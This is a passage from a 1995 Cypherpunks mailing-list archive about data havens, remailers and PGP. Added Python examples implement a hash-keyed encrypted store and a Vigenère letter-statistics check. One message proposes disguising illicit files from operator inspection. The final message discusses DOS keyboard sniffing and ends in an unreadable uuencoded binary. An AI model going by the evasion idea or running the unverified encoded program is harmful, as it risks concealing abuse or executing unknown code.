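        file_hash = hashlib.sha256(ciphertext).hexdigest()
        self.files[file_hash] = ciphertext
        return file_hash

    def retrieve(self, file_hash: str, key: bytes, claimed_prefix: bytes):
        ciphertext = self.files.get(file_hash)
        if ciphertext is None:
            return None                     # no file with that hash
        if len(claimed_prefix) < MIN_PREFIX:
            return None                     # an empty or tiny prefix proves nothing
        # Decrypt only as much as is needed to check the claim.
        head = keystream_xor(key, ciphertext[:len(claimed_prefix)])
        if not hmac.compare_digest(head, claimed_prefix):
            return None                     # wrong key or wrong prefix
        return ciphertext


if __name__ == "__main__":
    # Constructed sample plaintext.
    plaintext = b"Constructed sample: Alice's archived notes, volume 1.\n" * 4
    key = secrets.token_bytes(32)
    haven = DataHaven()
    handle = haven.deposit(keystream_xor(key, plaintext))

    returned = haven.retrieve(handle, key, plaintext[:MIN_PREFIX])
    print(keystream_xor(key, returned) == plaintext)                     # True
    print(haven.retrieve(handle, secrets.token_bytes(32),
                         plaintext[:MIN_PREFIX]))                        # None
```

Once retrieve() has been called the operator holds the key, so from that point on the stored file is readable to the haven.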




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 10:02:18 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <9501130137.AA03281@eri.erinet.com>
Message-ID: <199501131800.KAA02934@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   At 10:08 PM 1/11/95 -0800, Eric Hughes wrote:
   > ... Seems to me that a quite reasonable condition of use of a remailer is
   >that what is passed isn't human readable.

   From: pstemari@erinet.com (Paul J. Ste. Marie)

   Perhaps I missed this, but why?  If someone is going to plant
   kiddie porn or whatever on you, does it really matter if they
   encrypt it first or not?

If you can't read it, it's not kiddie-porn *for you*, although it
might be for someone with the key.

Encryption fragments meaning subjectively.  A magazine, for example,
has a fixed center of meaning for all who can read the language.  A
magazine looks the same to all who look at it.  An encrypted file
looks different to those who have the key from those who do not.

Encrypted data is fundamentally different from paper-and-ink data in
this way.  The metaphor of "planting it on somebody" does not apply to
data that the "somebody" can't read.

   I forget the name of the cypher (Vigenère, perhaps--the one that uses
   a series of Caesar-like cyphers keyed by a password), but you could
   just run it through that with a password of
   abcdefghijklmnopqrstuvwxyz and you'd flatten out the distribution
   enough to get it by casual inspection.

Fine.  I think that would suffice.  If you can't easily read it, you
can't be expected to have read it.  The operator of a data service has
_zero_ motivation to cryptanalyze something.  If they happen to apply
a viewer to the file (for whatever reason), they don't _want_ to see
what's inside.

Eric
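
Added example (not part of the original message): the transform from the quoted text, a Vigenère cipher keyed with the alphabet, run through the kind of letter-statistics check an operator might apply. The sample paragraph is taken from the message above; the index-of-coincidence threshold, the minimum length and the function names are assumptions.

```python
import string
from collections import Counter

KEY = string.ascii_lowercase   # the password suggested in the quoted text
MIN_LETTERS = 50               # assumed floor; shorter input gives a noisy statistic
IC_THRESHOLD = 0.05            # assumed cut: English is near 0.066, flat text near 0.038

# Sample input: a paragraph from the message above.
SAMPLE = (
    "Encryption fragments meaning subjectively. A magazine, for example, "
    "has a fixed center of meaning for all who can read the language. "
    "A magazine looks the same to all who look at it. An encrypted file "
    "looks different to those who have the key from those who do not."
)


def vigenere(text: str, key: str = KEY, decrypt: bool = False) -> str:
    """Shift each ASCII letter by the next key letter; other characters pass through."""
    out, i = [], 0
    for ch in text:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[i % len(key)]) - ord("a")
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def index_of_coincidence(text: str) -> float:
    """Probability that two letters drawn from the text are the same letter."""
    letters = [c for c in text.lower() if c in string.ascii_lowercase]
    n = len(letters)
    if n < 2:
        return 0.0
    counts = Counter(letters)
    return sum(c * (c - 1) for c in counts.values()) / (n * (n - 1))


def classify(text: str) -> str:
    """Operator-side check: does the letter distribution look like English?"""
    letters = sum(1 for c in text if c in string.ascii_letters)
    if letters < MIN_LETTERS:
        return "too-short"
    if index_of_coincidence(text) >= IC_THRESHOLD:
        return "readable"
    return "opaque"


if __name__ == "__main__":
    flattened = vigenere(SAMPLE)
    for label, text in (("original", SAMPLE), ("flattened", flattened)):
        print(label, round(index_of_coincidence(text), 4), classify(text))
    # The key is public, so anyone who tries can reverse the transform.
    print(vigenere(flattened, decrypt=True) == SAMPLE)
```

The check measures only whether the text reads as English at a glance; because the key is the alphabet itself, the transform keeps nothing secret from anyone who applies it in reverse.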




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 10:09:41 PST
To: cypherpunks@toad.com
Subject: Re: essential characteristics of a Data Haven
In-Reply-To: <Pine.NXT.3.91.950112180625.3304B-100000@kisa>
Message-ID: <199501131807.KAA02940@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Adam Feuer <adamfast@seanet.com>

   what differentiates a "data haven" from "reasonably secure offsite
   storage"?

Right now, that's easy.  Data havens don't exist, and prototype code
for reasonably secure off-site storage does.

The key distinguishing feature of off-site storage is that it stores
data only as bits, structured and segmented, but not interpreted _as_
anything but bits.  A data haven, on the other hand, holds things that
someone disapproves of, otherwise there's no need for a haven.  _A
fortiori_, if someone disapproves of it, it must mean something.  Raw
bits don't mean anything, or rather, they can mean everything.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 10:14:13 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501130333.QAA03633@akeake.its.vuw.ac.nz>
Message-ID: <199501131811.KAA02946@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Paul Foley <Paul.Foley@vuw.ac.nz>

   NZ Telecom are conducting an experiment with using phonecards in
   softdrink vending machines.  There was an article in The Dominion
   newspaper's _InfoTech_ magazine crying out for the Government to stop
   it, claiming Telecom's creating an independent (from the Reserve Bank)
   currency, will destroy the New Zealand economy, etc., etc.

Sounds like your basic central banking ignorance.

Look folks, just so y'all don't look like idiots, remember this: A
means of payment is not the same thing as a currency.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com (Dave Del Torto)
Date: Fri, 13 Jan 95 10:24:16 PST
To: cypherpunks@toad.com
Subject: Re: Pgp where?
Message-ID: <ab3c722e200210036071@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 am 1/12/95, kevin.rock@njackn.com wrote:
>I think this is the correct board to put this message on, but since there are
>no messages to read here I might be wrong.  Does anyone know where to locate
>the program (algorithm) Pretty Good Protection (PGP) ?  I've read about it in
>the local newspaper, in Scientific American and in the alternate news message
>area.  It sounds like a good encryption scheme and I would like to explore
>its possibilities.  Thanks for any assistance.


Kevin,

FYI, I keep the most recent version of Mike Johnson's excellent guide on
where to find PGP in:

  ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt

This is a plain text file, but (for Mac users) the file:

  ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt.sea.bin

is a self-expanding Mac archive (faster transfer time). There're some other
informational files in that dir, and any cpunks who know of a
quintessential PGP info file are encouraged to let me know so I can post it
there. Remember, this "archive" is oriented toward new PGP users who need
friendly information on why/how/who/where/when etc.

If you're in the US or Canada, you can also find the most up-to-date
version of the MacPGP application in this directory:

  ftp.netcom.com:/pub/dd/ddt/crypto/NOT_FOR_EXPORT

Be sure to read the ReadMe files detailing the export restrictions, since
transfer of this software to a system or machine outside of the US or
Canada is strictly verboten.

Send email to <pgp-questions@lsd.com> if you have further questions.

   dave
______________________________________________
 "Civil Liberty Through Simple Cryptography."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Halvor Kise jr." <HALVORK@sofus.hiof.no>
Date: Fri, 13 Jan 95 01:46:23 PST
To: cypherpunks@toad.com
Subject: Re: Some PGP problems
Message-ID: <14DAA230C3F@sofus.hiof.no>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

I have sent a reply to C. Crunch.
I enclosed the "Where to get the latest PGP"-FAQ

- Halvor.


>Hi,
>
>I'm trying to decode a PGP file that was created with Ver 2.6.
>At this time,  I thought that my older ver 2.1c (Running on a
>Mac) would at least be able to decrypt something made from
>a higher version,  running on a PC.   Apparently that is not so.
>
>So,  the next thing I did,   or what any self respecting
>Cypherpunk might do,   is to go out on the net and look
>for a later version to FTP.   Well,   after discovering
>that soda.berkeley.edu don't exist anymore,  I eventually
>found the ftp site where it lives.  ftp.csua.berkeley.edu.
>
>I learn that Mac PGP2.3 exists,  but NO version 2.6
>exists for the Mac.   Is that true?    If not,  then
>where can I get a copy,  so I can decode a message
>created with 2.6?    If ver 2.3 will decode a message
>encoded with 2.6,  then I'm faced with how I can
>extract this Mac file which has a .gz extension.
>Binhex don't seem to decode it.  So,  I now got this
>file named "macpgp2.3.cpt.hqx.gz" on my Mac.    Was
>I supposed to have used some special UNIX utility to
>convert the .gz thingie first?    Please enlighten
>this confused cypherpunker!!! :-)   Or will I even have
>to do all of this because 2.3 is incompatible with 2.6.
>
>C. Crunch

--

                         * MEMENTO MORI *

        _____________________________________________________
        | Halvor Kise jr.     *  Halvor.Kise.jr@hiof.no     |
        |                     *  halvork@sofus.hiof.no      |
        |     Ostfold         *  halvork@frodo.hiof.no      |
        | Regional College    *        Student at           |
        |  N-1757 Halden      *     Computer Science        |
        |                     *                             |
        |                                                   |
        |         Finger halvork@sofus for PGP-key          |
        -----------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 13 Jan 95 11:00:30 PST
To: cypherpunks@toad.com (cypherpunks)
Subject: Re: FBI and BLACKNET
In-Reply-To: <HeW5lKjqRyHD077yn@mirage.skypoint.com>
Message-ID: <9501131859.AA09568@doom>
MIME-Version: 1.0
Content-Type: text/plain



If anyone is interested, I have a complete "FOIA Kit," issued by the
Fund for Open Information and Accountability, Inc.  It includes
instructions, advice, and an assortment of sample letters.

E-mail me if you would like a copy.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 11:14:22 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <N3V5lG9s1WC8075yn@wwa.com>
Message-ID: <199501131912.LAA02985@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: lce@wwa.com (Larry E)

   The goal is to convince the two groups of concerned parties[, in
   short, users & lawyers,] that the remailer operators don't know the
   contents of what's passing through their remailers:

This is exactly right.  With a sealed box which you can't look in at
all, this is easy.  Providing an assurance on a general purpose
computer is more difficult.  And yes, it _is_ always possible to
simulate a filter that's not a filter, blah, blah, blah.  We are in
the realm of social interactions here, not in the realm of technology.

   The remailers are operated by people who want to promote information
   flow, not restrict it.  They provide an important service that is of
   critical importance to some people and groups who use the net.  They
   shouldn't be held accountable for the few who abuse the remailers,
   and encryption helps prevent that from happening.

I agree with this argument.  It is the germ of discourse about the
public policy of remailers and anonymity generally.  I want to point
out the rhetorical content of this statement, though, more than my
agreement with it.

The cypherpunks list is filled with paranoid nay-sayers who can't
distinguish their own paranoia from a legitimate technological
failing.  I feel a dire need for a positive rhetoric of cryptography.
I want to be 'for' something and to know what it's good for rather
than to be against everything that doesn't meet my personal desires.

How many times have I seen a particular solution whose response is "But
I want more, and this won't work for that"!  The most self-deceptive
say "It can't be done", the slightly more honest say "You can't do
it", and none say "I will not do it".  So now all you people who think
that remailers don't work, don't run one.  Good, I see most of you are
already complying with this directive.

Even the simplest remailer has utility.  If there were no utility,
then nobody would use them (duh).  It is not only foolishness and
idiocy but also mendaciousness to say that "remailers just don't
work".  It is constructive to say, however, that "the current
remailers don't work against the following opponent", but this is not
usually the case.  Rather, the speaker's paranoia silently projects
their own requirements onto a technical discussion, leaving only
confusion.

Look at the recent conversation over postage for remailers.
Paraphrasing: "Credit cards won't work because they're not anonymous".
My response: "Bullshit".  Using a credit card as a means of payment
does put constraints on usage, but it doesn't prevent usage (duh
redux).  What credit card payment does do is to require more effort in
order to link email transactions.  This is an unalloyed good, but pure
silver instead of gold.  There are better ways, one of them First
Virtual, which at the least has counterparty anonymity; another, blind
sigs (as yet unusable for payments).

The implicit assumption here is that "If I can't use it to smash the
state, it's worthless".  Well, thank you very much for constraining my
ability for privacy with your political agenda.  And I have a hint for
all the state-smashing wannabe-businesspeople out there: the ones who
have a business (less secure) now will eat your lunch for the business
(more secure) later.

To be dry and academic about this, I'd say that the problem was an
insufficiency in threat modelling.  But that just doesn't quite mean
the same thing, n'est ce pas?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 11:17:44 PST
To: cypherpunks@toad.com
Subject: Re: time stamping service (again)
In-Reply-To: <m0rSZSa-0009v8C@sdwsys>
Message-ID: <199501131916.LAA02991@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: sdw@lig.net (Stephen D. Williams)

   It should have minimize bandwidth, minimize cpu, minimize storage
   levels of service to allow different levels of users to have
   different possible impact on the machine.  (Ie. : local, paying,
   regional, unknown, domain, etc.)

This is the area of policy, for which there are no general purpose
solutions that I know of.  I see a need for a general purpose module
that would accept authorization requests from various end-user
services (remailing, timestamping, storage, etc.) and return yes or
no.  If money is part of the policy, this is the place to implement
it.

That said, I don't think the lack of a policy engine prevents a
cypherware distribution from happening.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 11:21:15 PST
To: cypherpunks@toad.com
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501130154.B28998-0100000@nesta.pr.mcs.net>
Message-ID: <199501131919.LAA02994@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Nesta Stubbs <root@nesta.pr.mcs.net>

   are you saying that there is an agreement between the data haven operator 
   and the user?

There's always an agreement, implicit or explicit.

   Right now we are getting into so many fraggin different definitions of
   data haven, that this conversation is looping over itself infinitely.

Well, the 'data haven' that started the topic of discussion was a
misnomer; it's really an off-site storage facility.  I don't know
about the rest of the list, but I'm more concerned with discussing
working code.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 13 Jan 95 09:31:26 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Dangerous Web Site
Message-ID: <Pine.ULT.3.91.950113112935.6321A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was net-surfing and I came across the following site:

	http://www.satelnet.org/

They do credit checks of any person, SS# ID's, national database 
searches, etc of any person or business (for a small fee).

Gee, don't I feel like little brother now.

____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=>     I am Pentium of Borg
   \/   Finger for PGP Public Key  <=>   you will be approximated





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com
Date: Fri, 13 Jan 95 13:02:01 PST
To: cypherpunks@toad.com
Subject: Re: Remailer@jpunix.com down!!!???
Message-ID: <9501131702.AA06825@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> From: "Joshua M. Sled" <jsled@eis.calstate.edu>
> Subject: Re: Remailer@jpunix.com down!!!???
> 
> On Fri, 13 Jan 1995, Samuel Kaplin wrote:
> 
> > I just read that the remailer at jpunix.com went down suddenly and
> > permanently. Anyone know what happened?? I also believe the whole site is
> > down as it didn't answer my pings a couple of days ago.
> 
> He was getting spam from AOL at the rate of 25 messages every 5 
> seconds... so he took the system down.

I missed the specifics of this the first time.  How was the spammer doing
it?  Obviously he wasn't chaining his mail, or there'd be no way to know
he was from AOL.  Was JP unable to determine the guy's actual address?  Or
was he posting in the clear sans anonymity?

Sorry if this has been covered already.  I remember seeing the incident
mentioned, but I can't recall the explanation of why JP was powerless to
do anything about it.

Thanks.

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas.Elbert@gmd.de (Andreas Elbert)
Date: Fri, 13 Jan 95 03:11:57 PST
To: cypherpunks@toad.com
Subject: Re: "safe" Internet access
Message-ID: <ab3c0afd00021004a7bf@[141.12.61.146]>
MIME-Version: 1.0
Content-Type: text/plain


sorry to correct you, but the 900 MHz licensefree radios, the cellular
radios (analog and digital) and Modacom and Mobitex are all different
animals.
i don't want to go into details though, because it doesn't change your main
point, the ability to localize one of these radios while transmitting.

Andreas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 13 Jan 95 09:17:11 PST
To: Andreas Elbert <Andreas.Elbert@gmd.de>
Subject: Re: "safe" Internet access
In-Reply-To: <ab3c0afd00021004a7bf@[141.12.61.146]>
Message-ID: <Pine.SUN.3.91.950113121410.26796A-100000@ether.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Jan 1995, Andreas Elbert wrote:

> sorry to correct you, but the 900 MHz licensefree radios, the cellular
> radios (analog and digital) and Modacom and Mobitex are all different
> animals.
> i don't want to go into details though, because it doesn't change your main
> point, the ability to localize one of these radios while transmitting.

However, if there are a large number of 900 MHz radio modems operating in 
a cryptographically secure spread-spectrum method, it may be very 
difficult to locate your particular transmitter...however the modem you 
are talking to will know your pseudonoise sequence, and a receiver that 
knows this will have a much easier time tracking you down.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Fri, 13 Jan 95 11:27:56 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110104ab3c75c9a6c6@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 AM 1/13/95, Eric Hughes wrote:
>   From: Ben.Goren@asu.edu
>
>   Here's a solution:
>
>What problem, pray tell, does this solve?

That of the data haven operator being able to deny knowledge of the
contents of files people send him. He'll only return files that, when
operated on by a strong cryptographic algorithm, make sense. He therefore
can't look inside the files until the owner asks for them back. If he
operates a timely (and automated) service, he can't know the contents until
after he's already sent the file back. If the server automatically deletes
the file upon return, he can't even tell what's in it then.

Further, an "authority" won't gain anything by seizing the data.

>It seems far more
>complicated than it need be.

As best I can tell, none of the previous suggestions guarantees that the
file is unreadable. How would you accomplish that in a simpler manner? Or
would you, as the operator of a data haven, not mind the risk of somebody
designing an illegal file that passes all your filters and tipping off the
police that you've got such a file on your computer, available to all--for
sale, even?

If there were a weakness in your filter, somebody could easily exploit that
weakness and get the use of your haven. With my system, they could send you
anything they liked, but it'd be little more than a cash donation, as
they'd never get it back. Your liability would be the same as if the person
had just emailed you the file and blew the whistle.

>   Alice sends a file to Dave's DataHaven. When Alice wants her file back, she
>   sends to Dave a secure hash of the file, a key with which to decrypt it,
>   and a handful of plaintext at the beginning of the file. Dave decrypts the
>   file that matches the hash with the key Alice gave him; if the file begins
>   as Alice says it should, Dave returns the file to Alice.
>
>Eric

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.
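
The deposit and retrieval exchange described in the message above, as an added example (not code from the thread or from any list participant). Assumptions: SHA-256 as the "secure hash", a stdlib-only keystream XOR standing in for a real cipher, a 16-byte minimum prefix, Dave returning the stored ciphertext, and all names (`DataHaven`, `alice_prepare`, `keystream_xor`, `demo`) are hypothetical.

```python
import hashlib
import hmac
import secrets

MIN_PREFIX = 16  # assumption: smallest "handful of plaintext" Dave accepts


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher (assumption): XOR with a SHA-256 counter keystream.

    Encrypting and decrypting are the same operation. A real service would
    use a vetted cipher; this keeps the example runnable offline.
    """
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


class DataHaven:
    """Dave's side: opaque blobs indexed by their hash, nothing else."""

    def __init__(self):
        self._store = {}

    def deposit(self, blob: bytes) -> str:
        # Dave learns only the bytes and their digest; no key, no plaintext.
        digest = hashlib.sha256(blob).hexdigest()
        self._store[digest] = blob
        return digest

    def holds(self, digest: str) -> bool:
        return digest in self._store

    def retrieve(self, digest: str, key: bytes, claimed_prefix: bytes):
        """Return the stored blob only if it decrypts to the claimed prefix."""
        blob = self._store.get(digest)
        if blob is None or len(claimed_prefix) < MIN_PREFIX:
            return None
        # Design choice of this example: decrypt only the bytes needed for
        # the comparison, so the server never materialises the whole file.
        head = keystream_xor(key, blob[:len(claimed_prefix)])
        if not hmac.compare_digest(head, claimed_prefix):
            return None
        # Automatic deletion on return, as the message suggests.
        del self._store[digest]
        return blob


def alice_prepare(plaintext: bytes, prefix_len: int = MIN_PREFIX):
    """Alice's side: encrypt locally, remember key and leading plaintext."""
    key = secrets.token_bytes(32)
    return key, keystream_xor(key, plaintext), plaintext[:prefix_len]


def demo():
    haven = DataHaven()
    # Constructed sample input, not taken from the thread.
    plaintext = b"Constructed sample document: off-site backup notes.\n" * 3
    key, blob, prefix = alice_prepare(plaintext)
    digest = haven.deposit(blob)

    results = {}
    wrong_key = bytes(b ^ 1 for b in key)
    results["wrong_key"] = haven.retrieve(digest, wrong_key, prefix)
    results["wrong_prefix"] = haven.retrieve(digest, key, b"X" * len(prefix))
    results["unknown_hash"] = haven.retrieve("0" * 64, key, prefix)
    results["still_held"] = haven.holds(digest)  # failed requests delete nothing

    returned = haven.retrieve(digest, key, prefix)
    results["recovered"] = keystream_xor(key, returned) == plaintext
    results["held_after"] = haven.holds(digest)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

What the check establishes is that the requester knows a key under which the stored bytes begin with the claimed prefix; because the requester supplies both values, it does not by itself show that the bytes were encrypted before deposit.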






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Fri, 13 Jan 95 06:12:50 PST
To: cypherpunks@toad.com
Subject: telecommunications reform again
Message-ID: <9501131259.AA05870@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Telecom Legislative Effort Opens
WASHINGTON, D.C., U.S.A., 1995 JAN 12 (NB) -- The Herculean task of rewriting
the nation's telecommunications law, an effort that failed in the 103rd
Congress, has begun in Washington.

The Senate Commerce Committee opened the action this week with a hearing on
general concepts of communications reform. The last time Congress
successfully addressed the communications needs of the nation was 50 years
ago, with the 1934 Communications Act.

The new Republican Congress is expected to support deregulation and
competition in the provision of telecommunications services. But so do most
Democrats, and the devil will be in the legislative details, as the various
forces in the marketplace seek to use legislative language to secure
competitive advantages.

Sen. Larry Pressler (R-SD), chairman of the committee, predicted that his
panel will report a bill by July 4. Rep. Jack Fields (R-Texas), who heads the
House telecommunications subcommittee, said his group will approve a bill by
Easter.

But neither legislator has yet to introduce a bill, so experts are unable to
predict where the inevitable fights will occur and on whose turf.

"Let's pick a starting date -- January 1, 1996 or 1997 -- and say,
'Gentleman, start your engines. We're going to have a race and let the best
man win,'" said Sen. Bob Packwood (R-Ore.) at the hearing.

As the opening bell was ringing in the Senate, Vice President Al Gore was
trying to gin up support for the administration's views on telecommunications
at a meeting of state regulators and local government officials.

"Competition in the information marketplace will provide Americans with lower
prices for their telephones, cable and information goods and services and
give them more and better choices," Gore said. The White House estimates that
competition in telecommunications will also create 1.4 million new jobs over
the next 10 years.

The contending forces were also getting organized. The seven regional Bell
operating companies announced that Gary McBee, former chairman of the United
States Telephone Association, will head their lobbying efforts in the new
Congress. The Baby Bells support opening all markets to immediate
competition.

"It's time to open all markets to all competitors, under the same conditions
and at the same time," McBee said. "That will mean lower prices, more choices
and better service for everyone." McBee's coalition will be called the
Alliance for Competitive Communications.

(Kennedy Maize/19950111/Press Contact: Bill McCloskey, ACA, 202-463-4129)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 13 Jan 95 11:24:37 PST
Subject: Amusing thing that might interest
Message-ID: <Pine.ULT.3.91.950113132211.13038B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


I thought that this might amuse:

--------------------
Newsgroups: rec.humor.funny
From: scotta@kije.gsfc.nasa.gov (Scott Austin)
Subject: Information Superhighway: The Real Scoop

As seen in "Abort, Retry, Fail?", by Don Willmont, from the July '94 PC 
Magazine.

-------------------------
Renaming the Info Highway
-------------------------

We asked you to help us rename the Information Highway, and boy, did you ever!

[runner-up info deleted]

The winner is Kevin Kwaku, who suggested that while the Information 
Superhighway is a bad name, it could be a great acronym, standing for 

"Interactive Network For Organizing, Retrieving, Manipulating, Accessing, 
 And Transferring Information On National Systems, Unleashing Practically
 Every Rebellious Human Intelligence, Gratifying Hackers, Wiseacres, And
 Yahoos."


Scott Austin
scott_austin@cnt.com
--
Selected by Maddi Hausmann Sojourner.  MAIL your joke to funny@clarinet.com.
Attribute the joke's source if at all possible.  A Daemon will auto-reply.

Remember: Always give your jokes a descriptive "Subject:" line.
Don't use "joke" or "submission" or "joke submission," please.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Fri, 13 Jan 95 12:34:44 PST
To: cypherpunks@toad.com
Subject: Re: Keyboard sniffing in DOS
Message-ID: <9501132033.AA17462@toad.com>
MIME-Version: 1.0
Content-Type: text


 <m00012@kanga.stcloud.msus.edu> wrote:

: For Dos operating systems.

  [..]

: But, here it is, the source code for a keyboard sniffer program.

  [..]

: Then, test it out with pgp or other dos based programs that ask
: you for a password (use a fake one), and you will probably see
: how insecure most of these programs are.

: Mike

I've thought about that problem too for terminal as well as crypto,
(after seeing an article in 2600 about sniffing a roommate's passwords
to the "K00L EL1T3 B0ARDZ") and started on a small "secure" keyboard
handler.

Here it is, though in very incomplete form.  It ignores Pause, Cntl-
Break and PrintScreen and doesn't make an annoying noise when the 
buffer is full, and may not work entirely for enhanced keyboards (since
I do not own one to test it on). There's plenty of room for improvement
in this, I'm sure...

It does have some features like random-noise sampling, "SuperKey" codes
and multiple keypress maps (as well as an option to hook into Interrupt
0x16 if security isn't a priority).

The interface is in Turbo Pascal because I haven't made the migration
to C yet (don't flame).  Any help with fix-ups, improvements, a C
interface and constructive suggestions would be appreciated.

I've tested it with KeyTrap and it *seems* safe from such monitoring
trojans.... 

  Rob <rrothenb@ic.sunysb.edu> PGP Key ID = 0xab1f4831

MNPW\;AZ@7NU;L44FU'+`O9A.R,OV'OFWY6^L\)&TW[PY>,6,K?V*],!HA.[-
M,L:O]W>PC4R".0UC^`':WY]OPAORR?)N7?]F9WSOR=EG8!FL#=C)D/D98%KM
MP(\M&PWPG6L1NK,"LT7`^OX<AAS2B6LWHXW_&,V;U-G\@E!@=+0)%Y9-B>Q^
MV1PW3X,'TM[;/6J`H0C``S@-@^"V04:?&Z3=/GK3DM:$(V+YMQ$8JP[7B'WK
MSG7(QR"VH8'\[-SRWT[6R\?(M:/F)@Y"P#1HVM8OS,HNJ;?FQO`<-'L<W-QX
M-))DOJ?TEHR"&$S32_`Y_)N(NQ11C`Z%3X%:,)-`O>4X\#N`6[@/U'G5$=B1
M@'0=M-5@YF`TVN>>'WL[IR&U@*+I8S2A?S;X=UTOWNE3KT$NK0WZ1-.ENXAW
M+L-X:@ME_SN8;B^X9VA#%YPZHFLK!`?)>P1/`6THVFSA44&S#0/`(0('*MRL
MX^A=8C68AR2,K\W\"?`";`HVG$T8JH`78;`"2Q^#)@$7DP0^3<#PH0P7`'@Z
MOAKU83KPQ38V.@C-9I-\*5D'ZL-?-BS:K61:.W!H](Z\'!(G\%_$W,,)?.Z)
MT"AFN_2J!%P"!4@-0MBN;N]C@TP&T\&HWR"SX<4`'+T&H;$-2$D@8^9F(GPD
MX70XGG+)Z<+V-)#6[!(M-CXC"QU@B\Q`L)`9Q&(`!T0P9$7)30#N->6+_</W
M_^'[__#]I>__;>W@7TPS=X#U-Z&-ZBR";:8HG1%=S3U8F6ACHTZ#;0<UQHB^
MZ$XOR$&SQ61QAG^`X61AQ%LPAJ"Y8(^W#D-T)CK_T7TW/!OU!V>DX.VSW<A\
M"ULC]+O3T(<'/#1HY68X!CW.A``VM*5#`;3C\$P?30CLU'!%'[SPJ3%N,<#O
M@VXE)<$5?G;;2T07NR7V"@3?!G--=*OY_!FJZVM4UU-ZHX.XWV(04ZT._5;4
MC\7(CW/GS+/`H!='MH_8R/%B@:L'<I7X51"XQIN(\('M_]P5L,!T?PK"V^D:
M/9D<K#<,5@+A9^C[B^_[:+#6%N@5&!?A.`&*K>X`F%.#EK54.P$NX*85.MFR
MD]PJ'22J=)H[@JI<IS>'2USFRR",T3_)+_$N+F^.V8;)SH$LQ6$`&@A&,ZZ9
